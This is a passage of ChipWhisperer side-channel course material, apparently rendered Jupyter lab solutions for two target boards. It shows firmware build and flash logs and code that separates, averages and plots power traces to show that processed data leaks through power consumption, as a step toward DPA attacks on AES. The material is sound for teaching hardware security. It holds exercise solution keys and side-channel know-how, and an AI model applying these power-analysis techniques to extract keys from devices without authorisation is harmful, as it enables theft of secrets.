-I.././hal/stm32f3/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/stm32f3_hal_lowlevel.o.d .././hal/stm32f3/stm32f3_hal_lowlevel.c -o objdir/stm32f3_hal_lowlevel.o 112 | . 113 | Compiling C: .././hal/stm32f3/stm32f3_sysmem.c 114 | arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -DNO_EXTRA_OPTS -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -gdwarf-2 -DSS_VER=SS_VER_1_1 -DSTM32F303xC -DSTM32F3 -DSTM32 -DDEBUG -DHAL_TYPE=HAL_stm32f3 -DPLATFORM=CWLITEARM -DTINYAES128C -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/stm32f3_sysmem.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f3 -I.././hal/stm32f3/CMSIS -I.././hal/stm32f3/CMSIS/core -I.././hal/stm32f3/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/stm32f3_sysmem.o.d .././hal/stm32f3/stm32f3_sysmem.c -o objdir/stm32f3_sysmem.o 115 | . 116 | Compiling C: .././crypto/tiny-AES128-C/aes.c 117 | arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -DNO_EXTRA_OPTS -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -gdwarf-2 -DSS_VER=SS_VER_1_1 -DSTM32F303xC -DSTM32F3 -DSTM32 -DDEBUG -DHAL_TYPE=HAL_stm32f3 -DPLATFORM=CWLITEARM -DTINYAES128C -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/aes.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f3 -I.././hal/stm32f3/CMSIS -I.././hal/stm32f3/CMSIS/core -I.././hal/stm32f3/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/aes.o.d .././crypto/tiny-AES128-C/aes.c -o objdir/aes.o 118 | . 119 | Compiling C: .././crypto/aes-independant.c 120 | arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -DNO_EXTRA_OPTS -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -gdwarf-2 -DSS_VER=SS_VER_1_1 -DSTM32F303xC -DSTM32F3 -DSTM32 -DDEBUG -DHAL_TYPE=HAL_stm32f3 -DPLATFORM=CWLITEARM -DTINYAES128C -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/aes-independant.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f3 -I.././hal/stm32f3/CMSIS -I.././hal/stm32f3/CMSIS/core -I.././hal/stm32f3/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/aes-independant.o.d .././crypto/aes-independant.c -o objdir/aes-independant.o 121 | . 122 | Assembling: .././hal/stm32f3/stm32f3_startup.S 123 | arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -x assembler-with-cpp -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -DF_CPU=7372800 -Wa,-gstabs,-adhlns=objdir/stm32f3_startup.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f3 -I.././hal/stm32f3/CMSIS -I.././hal/stm32f3/CMSIS/core -I.././hal/stm32f3/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C .././hal/stm32f3/stm32f3_startup.S -o objdir/stm32f3_startup.o 124 | . 125 | Linking: simpleserial-aes-CWLITEARM.elf 126 | arm-none-eabi-gcc -mcpu=cortex-m4 -I. -DNO_EXTRA_OPTS -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -gdwarf-2 -DSS_VER=SS_VER_1_1 -DSTM32F303xC -DSTM32F3 -DSTM32 -DDEBUG -DHAL_TYPE=HAL_stm32f3 -DPLATFORM=CWLITEARM -DTINYAES128C -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-aes.o -I.././simpleserial/ -I.././hal -I.././hal/stm32f3 -I.././hal/stm32f3/CMSIS -I.././hal/stm32f3/CMSIS/core -I.././hal/stm32f3/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/simpleserial-aes-CWLITEARM.elf.d objdir/simpleserial-aes.o objdir/simpleserial.o objdir/stm32f3_hal.o objdir/stm32f3_hal_lowlevel.o objdir/stm32f3_sysmem.o objdir/aes.o objdir/aes-independant.o objdir/stm32f3_startup.o --output simpleserial-aes-CWLITEARM.elf --specs=nano.specs --specs=nosys.specs -T .././hal/stm32f3/LinkerScript.ld -Wl,--gc-sections -lm -Wl,-Map=simpleserial-aes-CWLITEARM.map,--cref -lm 127 | . 128 | Creating load file for Flash: simpleserial-aes-CWLITEARM.hex 129 | arm-none-eabi-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature simpleserial-aes-CWLITEARM.elf simpleserial-aes-CWLITEARM.hex 130 | . 131 | Creating load file for EEPROM: simpleserial-aes-CWLITEARM.eep 132 | arm-none-eabi-objcopy -j .eeprom --set-section-flags=.eeprom="alloc,load" \ 133 | --change-section-lma .eeprom=0 --no-change-warnings -O ihex simpleserial-aes-CWLITEARM.elf simpleserial-aes-CWLITEARM.eep \|\| exit 0 134 | . 135 | Creating Extended Listing: simpleserial-aes-CWLITEARM.lss 136 | arm-none-eabi-objdump -h -S -z simpleserial-aes-CWLITEARM.elf > simpleserial-aes-CWLITEARM.lss 137 | . 138 | Creating Symbol Table: simpleserial-aes-CWLITEARM.sym 139 | arm-none-eabi-nm -n simpleserial-aes-CWLITEARM.elf > simpleserial-aes-CWLITEARM.sym 140 | Size after: 141 | text data bss dec hex filename 142 | 5388 532 1484 7404 1cec simpleserial-aes-CWLITEARM.elf 143 | +-------------------------------------------------------- 144 | + Default target does full rebuild each time. 145 | + Specify buildtarget == allquick == to avoid full rebuild 146 | +-------------------------------------------------------- 147 | +-------------------------------------------------------- 148 | + Built for platform CW-Lite Arm \(STM32F3\) with: 149 | + CRYPTO_TARGET = TINYAES128C 150 | + CRYPTO_OPTIONS = AES128C 151 | +-------------------------------------------------------- 152 | Serial baud rate = 38400 153 | INFO: Found ChipWhisperer😍 154 | Serial baud rate = 115200 155 | Detected known STMF32: STM32F302xB(C)/303xB(C) 156 | Extended erase (0x44), this can take ten seconds or more 157 | Attempting to program 5919 bytes at 0x8000000 158 | STM32F Programming flash... 159 | STM32F Reading flash... 160 | Verified flash OK, 5919 bytes 161 | Serial baud rate = 38400 162 | 163 | 164 | 165 | 166 | 167 | .. parsed-literal:: 168 | 169 | Lab 3_1 - Large Hamming Weight Swings (HARDWARE).ipynb:14: TqdmDeprecationWarning: Please use `tqdm.notebook.trange` instead of `tqdm.tnrange` 170 | "---\n", 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | **In [3]:** 181 | 182 | .. code:: ipython3 183 | 184 | assert len(trace_array) == 100 185 | print("✔️ OK to continue!") 186 | 187 | 188 | **Out [3]:** 189 | 190 | 191 | 192 | .. parsed-literal:: 193 | 194 | ✔️ OK to continue! 195 | 196 | 197 | 198 | Grouping Traces 199 | --------------- 200 | 201 | As we’ve seen in the slides, we’ve made an assumption that setting bits 202 | on the data lines consumes a measurable amount of power. Now, we’re 203 | going test that theory by getting our target to manipulate data with a 204 | very high Hamming weight (0xFF) and a very low Hamming weight (0x00). 205 | For this purpose, the target is currently running AES, and it encrypted 206 | the text we sent it. If we’re correct in our assumption, we should see a 207 | measurable difference between power traces with a high Hamming weight 208 | and a low one. 209 | 210 | Currently, these traces are all mixed up. Separate them into two groups: 211 | ``one_list`` and ``zero_list``: 212 | 213 | 214 | **In [4]:** 215 | 216 | .. code:: ipython3 217 | 218 | # ################### 219 | # Add your code here 220 | # ################### 221 | #raise NotImplementedError("Add Your Code Here") 222 | 223 | # ################### 224 | # START SOLUTION 225 | # ################### 226 | one_list = [] 227 | zero_list = [] 228 | 229 | for i in range(len(trace_array)): 230 | if textin_array[i][0] == 0x00: 231 | one_list.append(trace_array[i]) 232 | else: 233 | zero_list.append(trace_array[i]) 234 | # ################### 235 | # END SOLUTION 236 | # ################### 237 | 238 | assert len(one_list) > len(zero_list)/2 239 | assert len(zero_list) > len(one_list)/2 240 | 241 | We should have two different lists. Whether we sent 0xFF or 0x00 was 242 | random, so these lists likely won’t be evenly dispersed. Next, we’ll 243 | want to take an average of each group (make sure you take an average of 244 | each trace at each point! We don’t want an average of the traces in 245 | time), which will help smooth out any outliers and also fix our issue of 246 | having a different number of traces for each group: 247 | 248 | 249 | **In [5]:** 250 | 251 | .. code:: ipython3 252 | 253 | # ################### 254 | # Add your code here 255 | # ################### 256 | #raise NotImplementedError("Add Your Code Here") 257 | 258 | # ################### 259 | # START SOLUTION 260 | # ################### 261 | one_avg = np.mean(one_list, axis=0) 262 | zero_avg = np.mean(zero_list, axis=0) 263 | # ################### 264 | # END SOLUTION 265 | # ################### 266 | 267 | Finally, subtract the two averages and plot the resulting data: 268 | 269 | 270 | **In [6]:** 271 | 272 | .. code:: ipython3 273 | 274 | # ################### 275 | # Add your code here 276 | # ################### 277 | #raise NotImplementedError("Add Your Code Here") 278 | 279 | # ################### 280 | # START SOLUTION 281 | # ################### 282 | %matplotlib inline 283 | import matplotlib.pyplot as plt 284 | 285 | diff = one_avg - zero_avg 286 | 287 | plt.plot(diff) 288 | plt.show() 289 | # ################### 290 | # END SOLUTION 291 | # ################### 292 | 293 | 294 | **Out [6]:** 295 | 296 | 297 | .. image:: img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_1-LargeHammingWeightSwings_13_0.png 298 | 299 | 300 | You should see a very distinct trace near the beginning of the plot, 301 | meaning that the data being manipulated in the target device is visible 302 | in its power trace! Again, there’s a lot of room to explore here: 303 | 304 | - Try setting multiple bytes to 0x00 and 0xFF. 305 | - Try using smaller hamming weight differences. Is the spike still 306 | distinct? What about if you capture more traces? 307 | - We focused on the first byte here. Try putting the difference plots 308 | for multiple different bytes on the same plot. 309 | - The target is running AES here. Can you get the spikes to appear in 310 | different places if you set a byte in a later round of AES (say round 311 | 5) to 0x00 or 0xFF? 312 | 313 | -------------- 314 | 315 | NO-FUN DISCLAIMER: This material is Copyright (C) NewAE Technology Inc., 316 | 2015-2020. ChipWhisperer is a trademark of NewAE Technology Inc., 317 | claimed in all jurisdictions, and registered in at least the United 318 | States of America, European Union, and Peoples Republic of China. 319 | 320 | Tutorials derived from our open-source work must be released under the 321 | associated open-source license, and notice of the source must be 322 | *clearly displayed*. Only original copyright holders may license or 323 | authorize other distribution - while NewAE Technology Inc. holds the 324 | copyright for many tutorials, the github repository includes community 325 | contributions which we cannot license under special terms and **must** 326 | be maintained as an open-source release. Please contact us for special 327 | permissions (where possible). 328 | 329 | THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS 330 | OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 331 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 332 | IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY 333 | CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, 334 | TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE 335 | SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 336 | -------------------------------------------------------------------------------- /courses_sca101_SOLN_Lab 3_1 - Large Hamming Weight Swings-OPENADC-CWLITEXMEGA.rst: -------------------------------------------------------------------------------- 1 | Part 3, Topic 1: Large Hamming Weight Swings (MAIN) 2 | =================================================== 3 | 4 | 5 | 6 | **SUMMARY:** *In the previous part of the course, you saw that a 7 | microcontroller’s power consumption changes based on what it’s doing. In 8 | the case of a simple password check, this allowed us to see how many 9 | characters of the password we had correct, eventually resulting in the 10 | password being broken.* 11 | 12 | *That attack was based on different code execution paths showing up 13 | differently in power traces. In this next set of labs, we’ll posit that, 14 | not only does different instructions affect power consumption, the data 15 | being manipulated in the microcontroller also affects power 16 | consumption.* 17 | 18 | **LEARNING OUTCOMES:** 19 | 20 | - Using a power measurement to ‘validate’ a possible device model. 21 | - Detecting the value of a single bit using power measurement. 22 | - Breaking AES using the classic DPA attack. 23 | 24 | Prerequisites 25 | ------------- 26 | 27 | Hold up! Before you continue, check you’ve done the following tutorials: 28 | 29 | - ☑ Jupyter Notebook Intro (you should be OK with plotting & running 30 | blocks). 31 | - ☑ SCA101 Intro (you should have an idea of how to get 32 | hardware-specific versions running). 33 | - ☑ SCA101 Part 2 (you should understand how power consupmtion changes 34 | based on what code is being run) 35 | 36 | Power Trace Gathering 37 | --------------------- 38 | 39 | At this point you’ve got to insert code to perform the power trace 40 | capture. There are two options here: \* Capture from physical device. \* 41 | Read from a file. 42 | 43 | You get to choose your adventure - see the two notebooks with the same 44 | name of this, but called ``(SIMULATED)`` or ``(HARDWARE)`` to continue. 45 | Inside those notebooks you should get some code to copy into the 46 | following section, which will define the capture function. 47 | 48 | Be sure you get the ``"✔️ OK to continue!"`` print once you run the next 49 | cell, otherwise things will fail later on! 50 | 51 | 52 | **In [1]:** 53 | 54 | .. code:: ipython3 55 | 56 | SCOPETYPE = 'OPENADC' 57 | PLATFORM = 'CWLITEXMEGA' 58 | CRYPTO_TARGET = 'AVRCRYPTOLIB' 59 | VERSION = 'HARDWARE' 60 | 61 | 62 | **In [2]:** 63 | 64 | .. code:: ipython3 65 | 66 | if VERSION == 'HARDWARE': 67 | %run "Lab 3_1 - Large Hamming Weight Swings (HARDWARE).ipynb" 68 | elif VERSION == 'SIMULATED': 69 | %run "Lab 3_1 - Large Hamming Weight Swings (SIMULATED).ipynb" 70 | 71 | 72 | **Out [2]:** 73 | 74 | 75 | 76 | .. parsed-literal:: 77 | 78 | Building for platform CWLITEXMEGA with CRYPTO\_TARGET=AVRCRYPTOLIB 79 | SS\_VER set to SS\_VER\_1\_1 80 | Blank crypto options, building for AES128 81 | rm -f -- simpleserial-aes-CWLITEXMEGA.hex 82 | rm -f -- simpleserial-aes-CWLITEXMEGA.eep 83 | rm -f -- simpleserial-aes-CWLITEXMEGA.cof 84 | rm -f -- simpleserial-aes-CWLITEXMEGA.elf 85 | rm -f -- simpleserial-aes-CWLITEXMEGA.map 86 | rm -f -- simpleserial-aes-CWLITEXMEGA.sym 87 | rm -f -- simpleserial-aes-CWLITEXMEGA.lss 88 | rm -f -- objdir/\*.o 89 | rm -f -- objdir/\*.lst 90 | rm -f -- simpleserial-aes.s simpleserial.s XMEGA\_AES\_driver.s uart.s usart\_driver.s xmega\_hal.s aes-independant.s aes\_enc.s aes\_keyschedule.s aes\_sbox.s aes128\_enc.s 91 | rm -f -- simpleserial-aes.d simpleserial.d XMEGA\_AES\_driver.d uart.d usart\_driver.d xmega\_hal.d aes-independant.d aes\_enc.d aes\_keyschedule.d aes\_sbox.d aes128\_enc.d 92 | rm -f -- simpleserial-aes.i simpleserial.i XMEGA\_AES\_driver.i uart.i usart\_driver.i xmega\_hal.i aes-independant.i aes\_enc.i aes\_keyschedule.i aes\_sbox.i aes128\_enc.i 93 | . 94 | Welcome to another exciting ChipWhisperer target build!! 95 | avr-gcc.exe (WinAVR 20100110) 4.3.3 96 | Copyright (C) 2008 Free Software Foundation, Inc. 97 | This is free software; see the source for copying conditions. There is NO 98 | warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 99 | 100 | . 101 | Compiling C: simpleserial-aes.c 102 | avr-gcc -c -mmcu=atxmega128d3 -I. -DNO\_EXTRA\_OPTS -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DAVRCRYPTOLIB -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-aes.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -I.././crypto/avrcryptolib//aes -I.././crypto/avrcryptolib//gf256mul -std=gnu99 -MMD -MP -MF .dep/simpleserial-aes.o.d simpleserial-aes.c -o objdir/simpleserial-aes.o 103 | . 104 | Compiling C: .././simpleserial/simpleserial.c 105 | avr-gcc -c -mmcu=atxmega128d3 -I. -DNO\_EXTRA\_OPTS -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DAVRCRYPTOLIB -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -I.././crypto/avrcryptolib//aes -I.././crypto/avrcryptolib//gf256mul -std=gnu99 -MMD -MP -MF .dep/simpleserial.o.d .././simpleserial/simpleserial.c -o objdir/simpleserial.o 106 | . 107 | Compiling C: .././hal/xmega/XMEGA\_AES\_driver.c 108 | avr-gcc -c -mmcu=atxmega128d3 -I. -DNO\_EXTRA\_OPTS -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DAVRCRYPTOLIB -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/XMEGA\_AES\_driver.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -I.././crypto/avrcryptolib//aes -I.././crypto/avrcryptolib//gf256mul -std=gnu99 -MMD -MP -MF .dep/XMEGA\_AES\_driver.o.d .././hal/xmega/XMEGA\_AES\_driver.c -o objdir/XMEGA\_AES\_driver.o 109 | . 110 | Compiling C: .././hal/xmega/uart.c 111 | avr-gcc -c -mmcu=atxmega128d3 -I. -DNO\_EXTRA\_OPTS -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DAVRCRYPTOLIB -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/uart.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -I.././crypto/avrcryptolib//aes -I.././crypto/avrcryptolib//gf256mul -std=gnu99 -MMD -MP -MF .dep/uart.o.d .././hal/xmega/uart.c -o objdir/uart.o 112 | . 113 | Compiling C: .././hal/xmega/usart\_driver.c 114 | avr-gcc -c -mmcu=atxmega128d3 -I. -DNO\_EXTRA\_OPTS -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DAVRCRYPTOLIB -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/usart\_driver.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -I.././crypto/avrcryptolib//aes -I.././crypto/avrcryptolib//gf256mul -std=gnu99 -MMD -MP -MF .dep/usart\_driver.o.d .././hal/xmega/usart\_driver.c -o objdir/usart\_driver.o 115 | . 116 | Compiling C: .././hal/xmega/xmega\_hal.c 117 | avr-gcc -c -mmcu=atxmega128d3 -I. -DNO\_EXTRA\_OPTS -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DAVRCRYPTOLIB -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/xmega\_hal.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -I.././crypto/avrcryptolib//aes -I.././crypto/avrcryptolib//gf256mul -std=gnu99 -MMD -MP -MF .dep/xmega\_hal.o.d .././hal/xmega/xmega\_hal.c -o objdir/xmega\_hal.o 118 | . 119 | Compiling C: .././crypto/aes-independant.c 120 | avr-gcc -c -mmcu=atxmega128d3 -I. -DNO\_EXTRA\_OPTS -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DAVRCRYPTOLIB -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/aes-independant.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -I.././crypto/avrcryptolib//aes -I.././crypto/avrcryptolib//gf256mul -std=gnu99 -MMD -MP -MF .dep/aes-independant.o.d .././crypto/aes-independant.c -o objdir/aes-independant.o 121 | . 122 | Compiling C: .././crypto/avrcryptolib//aes/aes\_enc.c 123 | avr-gcc -c -mmcu=atxmega128d3 -I. -DNO\_EXTRA\_OPTS -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DAVRCRYPTOLIB -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/aes\_enc.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -I.././crypto/avrcryptolib//aes -I.././crypto/avrcryptolib//gf256mul -std=gnu99 -MMD -MP -MF .dep/aes\_enc.o.d .././crypto/avrcryptolib//aes/aes\_enc.c -o objdir/aes\_enc.o 124 | . 125 | Compiling C: .././crypto/avrcryptolib//aes/aes\_keyschedule.c 126 | avr-gcc -c -mmcu=atxmega128d3 -I. -DNO\_EXTRA\_OPTS -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DAVRCRYPTOLIB -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/aes\_keyschedule.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -I.././crypto/avrcryptolib//aes -I.././crypto/avrcryptolib//gf256mul -std=gnu99 -MMD -MP -MF .dep/aes\_keyschedule.o.d .././crypto/avrcryptolib//aes/aes\_keyschedule.c -o objdir/aes\_keyschedule.o 127 | . 128 | Compiling C: .././crypto/avrcryptolib//aes/aes\_sbox.c 129 | avr-gcc -c -mmcu=atxmega128d3 -I. -DNO\_EXTRA\_OPTS -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DAVRCRYPTOLIB -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/aes\_sbox.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -I.././crypto/avrcryptolib//aes -I.././crypto/avrcryptolib//gf256mul -std=gnu99 -MMD -MP -MF .dep/aes\_sbox.o.d .././crypto/avrcryptolib//aes/aes\_sbox.c -o objdir/aes\_sbox.o 130 | . 131 | Compiling C: .././crypto/avrcryptolib//aes/aes128\_enc.c 132 | avr-gcc -c -mmcu=atxmega128d3 -I. -DNO\_EXTRA\_OPTS -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DAVRCRYPTOLIB -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/aes128\_enc.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -I.././crypto/avrcryptolib//aes -I.././crypto/avrcryptolib//gf256mul -std=gnu99 -MMD -MP -MF .dep/aes128\_enc.o.d .././crypto/avrcryptolib//aes/aes128\_enc.c -o objdir/aes128\_enc.o 133 | . 134 | Assembling: .././crypto/avrcryptolib//gf256mul/gf256mul.S 135 | avr-gcc -c -mmcu=atxmega128d3 -I. -x assembler-with-cpp -DF\_CPU=7372800 -Wa,-gstabs,-adhlns=objdir/gf256mul.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -I.././crypto/avrcryptolib//aes -I.././crypto/avrcryptolib//gf256mul .././crypto/avrcryptolib//gf256mul/gf256mul.S -o objdir/gf256mul.o 136 | . 137 | Linking: simpleserial-aes-CWLITEXMEGA.elf 138 | avr-gcc -mmcu=atxmega128d3 -I. -DNO\_EXTRA\_OPTS -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DAVRCRYPTOLIB -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-aes.o -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -I.././crypto/avrcryptolib//aes -I.././crypto/avrcryptolib//gf256mul -std=gnu99 -MMD -MP -MF .dep/simpleserial-aes-CWLITEXMEGA.elf.d objdir/simpleserial-aes.o objdir/simpleserial.o objdir/XMEGA\_AES\_driver.o objdir/uart.o objdir/usart\_driver.o objdir/xmega\_hal.o objdir/aes-independant.o objdir/aes\_enc.o objdir/aes\_keyschedule.o objdir/aes\_sbox.o objdir/aes128\_enc.o objdir/gf256mul.o --output simpleserial-aes-CWLITEXMEGA.elf -Wl,-Map=simpleserial-aes-CWLITEXMEGA.map,--cref -lm 139 | . 140 | Creating load file for Flash: simpleserial-aes-CWLITEXMEGA.hex 141 | avr-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature simpleserial-aes-CWLITEXMEGA.elf simpleserial-aes-CWLITEXMEGA.hex 142 | . 143 | Creating load file for EEPROM: simpleserial-aes-CWLITEXMEGA.eep 144 | avr-objcopy -j .eeprom --set-section-flags=.eeprom="alloc,load" \ 145 | --change-section-lma .eeprom=0 --no-change-warnings -O ihex simpleserial-aes-CWLITEXMEGA.elf simpleserial-aes-CWLITEXMEGA.eep \|\| exit 0 146 | . 147 | Creating Extended Listing: simpleserial-aes-CWLITEXMEGA.lss 148 | avr-objdump -h -S -z simpleserial-aes-CWLITEXMEGA.elf > simpleserial-aes-CWLITEXMEGA.lss 149 | . 150 | Creating Symbol Table: simpleserial-aes-CWLITEXMEGA.sym 151 | avr-nm -n simpleserial-aes-CWLITEXMEGA.elf > simpleserial-aes-CWLITEXMEGA.sym 152 | Size after: 153 | text data bss dec hex filename 154 | 3454 32 228 3714 e82 simpleserial-aes-CWLITEXMEGA.elf 155 | +-------------------------------------------------------- 156 | + Default target does full rebuild each time. 157 | + Specify buildtarget == allquick == to avoid full rebuild 158 | +-------------------------------------------------------- 159 | +-------------------------------------------------------- 160 | + Built for platform CW-Lite XMEGA with: 161 | + CRYPTO\_TARGET = AVRCRYPTOLIB 162 | + CRYPTO\_OPTIONS = AES128C 163 | +-------------------------------------------------------- 164 | Serial baud rate = 38400 165 | INFO: Found ChipWhisperer😍 166 | XMEGA Programming flash... 167 | XMEGA Reading flash... 168 | Verified flash OK, 3485 bytes 169 | 170 | 171 | 172 | 173 | 174 | .. parsed-literal:: 175 | 176 | Lab 3\_1 - Large Hamming Weight Swings (HARDWARE).ipynb:14: TqdmDeprecationWarning: Please use \`tqdm.notebook.trange\` instead of \`tqdm.tnrange\` 177 | "---\n", 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | **In [3]:** 188 | 189 | .. code:: ipython3 190 | 191 | assert len(trace_array) == 100 192 | print("✔️ OK to continue!") 193 | 194 | 195 | **Out [3]:** 196 | 197 | 198 | 199 | .. parsed-literal:: 200 | 201 | ✔️ OK to continue! 202 | 203 | 204 | 205 | Grouping Traces 206 | --------------- 207 | 208 | As we’ve seen in the slides, we’ve made an assumption that setting bits 209 | on the data lines consumes a measurable amount of power. Now, we’re 210 | going test that theory by getting our target to manipulate data with a 211 | very high Hamming weight (0xFF) and a very low Hamming weight (0x00). 212 | For this purpose, the target is currently running AES, and it encrypted 213 | the text we sent it. If we’re correct in our assumption, we should see a 214 | measurable difference between power traces with a high Hamming weight 215 | and a low one. 216 | 217 | Currently, these traces are all mixed up. Separate them into two groups: 218 | ``one_list`` and ``zero_list``: 219 | 220 | 221 | **In [4]:** 222 | 223 | .. code:: ipython3 224 | 225 | # ################### 226 | # Add your code here 227 | # ################### 228 | #raise NotImplementedError("Add Your Code Here") 229 | 230 | # ################### 231 | # START SOLUTION 232 | # ################### 233 | one_list = [] 234 | zero_list = [] 235 | 236 | for i in range(len(trace_array)): 237 | if textin_array[i][0] == 0x00: 238 | one_list.append(trace_array[i]) 239 | else: 240 | zero_list.append(trace_array[i]) 241 | # ################### 242 | # END SOLUTION 243 | # ################### 244 | 245 | assert len(one_list) > len(zero_list)/2 246 | assert len(zero_list) > len(one_list)/2 247 | 248 | We should have two different lists. 